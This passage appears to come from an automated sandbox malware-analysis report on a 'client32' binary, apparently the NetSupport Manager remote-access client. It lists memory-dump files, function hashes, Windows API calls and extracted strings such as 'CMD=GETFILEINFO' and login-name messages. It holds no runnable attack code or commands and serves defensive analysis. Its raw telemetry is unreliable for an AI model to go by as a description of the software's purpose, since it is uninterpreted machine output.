Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
Instruction ID: 4286fe34f75cea7b88237b7f19c57be592dd9146774f55c5736f82da2c6cd1b6
Opcode Fuzzy Hash: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
Instruction Fuzzy Hash: 9A118A71E0022D9BDB51CBA8DC557EEB7E8AB49304F0040E9E909D7340DB70AE448B91

Function 685BA082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,685B6F16,00000000,?,685BD40B,00000001,685B6F16,00000000,00000000,00000000,?,685B6F16,00000001,00000214), ref: 685BA0C5

Part of subcall function 685B60F9: __getptd_noexit.LIBCMT ref: 685B60F9

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: a86f339c534cd9872d35ca9763ea1ed858abae99b83c821955b34f32ff375265
Instruction ID: 532255076f6bd0dac442deb89763c6b1f4246476fdcb51f1bb3143e61b06de08
Opcode Fuzzy Hash: a86f339c534cd9872d35ca9763ea1ed858abae99b83c821955b34f32ff375265
Instruction Fuzzy Hash: 0501D43130721ADFFB268E65CC74B5B3794EBA13A4F81452AED35EB180DB75D800C640

Function 1116C936 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,110B7069,00000000,?,111665A4,?,110B7069,00000000,00000000,00000000,?,11167F37,00000001,00000214,?,110B7069), ref: 1116C979

Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
Instruction ID: 4dc312edc878e3fc85dbd7a4fe26ae7c38801a5f560f23fe2cfbf25c3476fc95
Opcode Fuzzy Hash: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
Instruction Fuzzy Hash: 8A01D8317012669BFB168F66CD44B6BB79DAF81764F01452AE815CB2D0FBF1D820C780

Function 11163AB3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

__waccess_s.LIBCMT ref: 11163ABE

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __waccess_s
String ID:
API String ID: 4272103461-0
Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction ID: 5c2e7bbd61f30f1aea2da67b167f4c2082f9d237e02e17c26463379e16f3f813
Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction Fuzzy Hash: 1FC09B3745814D7F5F055DE5EC00C597F5DD6807747144115F91CC9490DE73E561D540

Function 1116076B Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 11160778

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: 7f7d982cc39844611e1edaafa4e80019d2d82fc8e8e4ac42b397e22a7b0e0c70
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 0BC09B7644010C77DF111A83DC05E457F1D97C0674F144010FF1C1D1609573E971D685

Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

_NSMClient32@8.PCICL32(?,?,004010A8,00000000), ref: 0040100A

Memory Dump Source

Source File: 00000007.00000002.3638445121.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3638427287.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3638462516.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3638481461.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_client32.jbxd

Yara matches

Similarity

API ID: Client32@8
String ID:
API String ID: 433899448-0
Opcode ID: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
Instruction ID: 101b8ead0f36abaf2e4a9e5d6dc85a2691bea7164fd7fac6f3abc260b8d29af7
Opcode Fuzzy Hash: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
Instruction Fuzzy Hash: 85B012B91043406FC104DB10C880D2B73A8BBC4300F008D0DB4D142181C734D800C632

Non-executed Functions

Function 685A4F30 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 192sleepCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000057), ref: 685A4F6D
EnterCriticalSection.KERNEL32(685DB898), ref: 685A4FE9
LeaveCriticalSection.KERNEL32 ref: 685A5002
_free.LIBCMT ref: 685A5086
_free.LIBCMT ref: 685A50BA
GetTickCount.KERNEL32 ref: 685A50CB
GetTickCount.KERNEL32 ref: 685A50E0
Sleep.KERNEL32(00000014,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 685A50F2
EnterCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 685A5108
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 685A5135
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 685A513F
SetLastError.KERNEL32(?), ref: 685A5154

Strings

Gateway_Gsk, xrefs: 685A4FC6
LINK=%s, xrefs: 685A507A
CMD=GETFILEINFO, xrefs: 685A5033
GSK=%s, xrefs: 685A504F

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$ErrorLast$CountEnterLeaveTick_free$Sleep
String ID: CMD=GETFILEINFO$GSK=%s$Gateway_Gsk$LINK=%s
API String ID: 619989478-944126313
Opcode ID: 5885f7d94dc046db7f7346b50a2fae7eb72d44b35c936f7d357ccbbdb73a017f
Instruction ID: c7affead552abfc5e2a6b71322a5ffadac840b49345ac4d2800bd3235128a7fc
Opcode Fuzzy Hash: 5885f7d94dc046db7f7346b50a2fae7eb72d44b35c936f7d357ccbbdb73a017f
Instruction Fuzzy Hash: BA618175904208EFCF10DFE8C884BEEB7B8EF45355F914169E955A7280DB31AE04CBA5

Function 11127110 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 400COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00000000,00000000,?), ref: 1112714B

Strings

advapi32.dll, xrefs: 11127226
QueryServiceConfig2W, xrefs: 1112724A
EnumServices returned %d, xrefs: 111271F4

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: EnumServices returned %d$QueryServiceConfig2W$advapi32.dll
API String ID: 1889721586-3267302290
Opcode ID: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
Instruction ID: 9fb7de677e030cfc0a01f6eedc798a2385bd80f55b8063cdc9a43f6634fa85b6
Opcode Fuzzy Hash: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
Instruction Fuzzy Hash: 39E17575A006599FEB24CF24CD94FABF7B9AF84304F208699E91997240DF30AE85CF50

Function 110251B0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 384windowtimeCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 11025347
DrawMenuBar.USER32(?), ref: 1102535E
GetMenu.USER32(?), ref: 110253B3
DeleteMenu.USER32(00000000,00000001,00000400), ref: 110253C1
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102531E

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

UpdateWindow.USER32(?), ref: 11025407
IsIconic.USER32(?), ref: 1102541A
SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102543A
KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 110254A0

Strings

m_hWnd, xrefs: 110253F6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110253F1
..\ctl32\chatw.cpp, xrefs: 1102520A
Chat, xrefs: 110251D8

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3085788722-363603473
Opcode ID: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
Instruction ID: b6232a099581f0ae497a3b344fdba13ecce31f738ecb0fc666d570829b7bf44f
Opcode Fuzzy Hash: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
Instruction Fuzzy Hash: 14D1AC74B40702ABEB14DB64CC85FAEB3A5BB88708F104558F6529F3C1DAB1F941CB95

Function 1103B220 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 189COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1103B306
_free.LIBCMT ref: 1103B400

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 110CCAD0: FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110CCB55
Part of subcall function 110CCAD0: LoadResource.KERNEL32(00000000,00000000), ref: 110CCB84
Part of subcall function 110CCAD0: LockResource.KERNEL32(00000000), ref: 110CCBA8
Part of subcall function 110CCAD0: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A889,110CAE00,00000000), ref: 110CCBD9
Part of subcall function 110CCAD0: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A889,110CAE00,00000000), ref: 110CCBF4
Part of subcall function 110CCAD0: GetLastError.KERNEL32 ref: 110CCC19

_calloc.LIBCMT ref: 1103B415
_free.LIBCMT ref: 1103B450

Strings

Login name %s, xrefs: 1103B3C9
Not logged in!, xrefs: 1103B365
, xrefs: 1103B39A
Get login name. Check if logged in, xrefs: 1103B32E
CLTCONN.CPP, xrefs: 1103B319, 1103B428
DoUserLogin, xrefs: 1103B24E
GetName, xrefs: 1103B296
u, xrefs: 1103B266

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Resource$CreateDialogIndirectParam_calloc_free$ErrorFindLastLoadLock_memsetwsprintf
String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
API String ID: 3626227667-1552251038
Opcode ID: 01fd35b3c109e338554ba1db0897715522d16d727ac1624b289d742af69260c7
Instruction ID: 25b904e35b270628fa9a38861c68e686706e0c30f1396ea4e15f3982f5bea4d1
Opcode Fuzzy Hash: 01fd35b3c109e338554ba1db0897715522d16d727ac1624b289d742af69260c7
Instruction Fuzzy Hash: 97612674E41A1AEFD710DFA4CCC1FADF3A5AB8470DF104269EA265B2C0EB716940C792

Function 1115B180 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 440COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 1115B1C6
RemovePropA.USER32(?), ref: 1115B1E5
RemovePropA.USER32(?), ref: 1115B1F4
RemovePropA.USER32(?,00000000), ref: 1115B203

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B55A

Strings

old_wndproc, xrefs: 1115B19D
..\ctl32\wndclass.cpp, xrefs: 1115B198

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
String ID: ..\ctl32\wndclass.cpp$old_wndproc
API String ID: 1777853711-3305400014
Opcode ID: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
Instruction ID: ee076e1b1c12c59e2fd2c34d2ca2faed304bf4b043a58102cf48aae30fabbc62
Opcode Fuzzy Hash: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
Instruction Fuzzy Hash: 43C17BB53041199FD748CE69E890E7FB3EAFBC8311B10466EF956C7781DA21AC118BB1

Function 1101F360 Relevance: 15.1, APIs: 10, Instructions: 54clipboardmemorywindowCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 1101F387
GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F397
GlobalLock.KERNEL32(00000000), ref: 1101F3A0
_memmove.LIBCMT ref: 1101F3A9
GlobalUnlock.KERNEL32(00000000), ref: 1101F3B2
EmptyClipboard.USER32 ref: 1101F3B8
SetClipboardData.USER32(00000001,00000000), ref: 1101F3C1
GlobalFree.KERNEL32(00000000), ref: 1101F3CC
MessageBeep.USER32(00000030), ref: 1101F3D4
CloseClipboard.USER32 ref: 1101F3DA

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
